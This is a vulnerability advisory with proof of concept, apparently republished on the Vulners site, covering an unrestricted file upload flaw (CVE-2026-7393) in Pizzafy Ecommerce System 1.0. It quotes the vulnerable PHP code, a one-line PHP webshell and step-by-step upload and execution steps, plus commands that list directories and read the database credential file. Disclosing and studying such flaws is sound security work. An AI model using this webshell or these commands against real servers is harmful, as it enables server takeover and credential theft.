Vulners
Lucene search
📄 Pizzafy Ecommerce System 1.0 Shell Upload
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2026-7393 | 29 Apr 202617:00 | – | attackerkb |
 | SourceCodester Pizzafy Ecommerce System 访问控制错误漏洞 | 29 Apr 202600:00 | – | cnnvd |
 | CVE-2026-7393 | 29 Apr 202617:00 | – | cve |
 | CVE-2026-7393 SourceCodester Pizzafy Ecommerce System File Extension admin_class_novo.php save_menu unrestricted upload | 29 Apr 202617:00 | – | cvelist |
 | EUVD-2026-26265 | 29 Apr 202617:00 | – | euvd |
 | CVE-2026-7393 | 29 Apr 202617:16 | – | nvd |
 | PT-2026-35959 | 29 Apr 202600:00 | – | ptsecurity |
 | CVE-2026-7393 SourceCodester Pizzafy Ecommerce System File Extension admin_class_novo.php save_menu unrestricted upload | 29 Apr 202617:00 | – | vulnrichment |
# Pizzafy Ecommerce System 1.0 – Unrestricted File Upload in save_menu() Leads to Remote Code Execution
## Details
| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Vendor URL** | https://www.sourcecodester.com |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
| **Version** | 1.0 |
| **Vulnerability** | Unrestricted File Upload → Remote Code Execution |
| **CWE** | CWE-434 |
| **CVSSv3 Score** | 7.8 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **User Interaction** | None |
| **Researcher** | Imad Alvi |
| **Date** | 2026-04-12 |
---
## Affected Component
**File:** `Pizzafy/admin/admin_class_novo.php` → `save_menu()` function
**Parameter:** `img` (FILE)
**Upload path:** `Pizzafy/assets/img/`
---
## Description
The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never actually checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.
**Vulnerable code in `admin_class_novo.php`:**
```php
function save_menu(){
extract($_POST);
// ...
if($_FILES['img']['tmp_name'] != ''){
$fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
$move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
$data .= ", img_path = '$fname' ";
}
// No extension check, no MIME type check
}
```
---
## Proof of Concept
### Step 1 — Create PHP Webshell
Create a file named `shell_web2.php` with the following content:
```php
<?php echo shell_exec($_GET['cmd']); ?>
```
### Step 2 — Upload Webshell via Menu Management
Login as administrator and navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu
```
Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171202" src="https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead" />
The shell is now listed as a menu item on the customer-facing page.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171236" src="https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731" />
### Step 3 — Locate Uploaded Shell
Navigate to the assets directory — directory listing is enabled (CWE-548):
```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/
```
The uploaded PHP shell is visible in the directory listing.
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171300" src="https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8" />
### Step 4 — Execute Remote Commands
Access the uploaded shell directly and pass system commands via the `cmd` parameter:
```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami
```
**Response — OS command executed on the server:**
```
desktop-g1i9np3\dell
```
<img width="1920" height="1080" alt="Screenshot 2026-04-12 171313" src="https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e" />
---
## Additional Commands
```
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php
```
---
## Impact
An authenticated administrator can:
- Upload arbitrary PHP files to the web server
- Execute any OS-level command on the server
- Read sensitive files including database credentials
- Establish a reverse shell for full persistent access
- Completely compromise the underlying server
---
## Note on Directory Listing (CWE-548)
The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files including the webshell. This compounds the severity of the file upload vulnerability.
---
## References
- [SourceCodester — Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-434: Unrestricted Upload of File with Dangerous Type
- CWE-548: Exposure of Information Through Directory Listing.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Apr 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.14.7
CVSS 45.1
CVSS 25.8
CVSS 34.7
EPSS0.0005
SSVC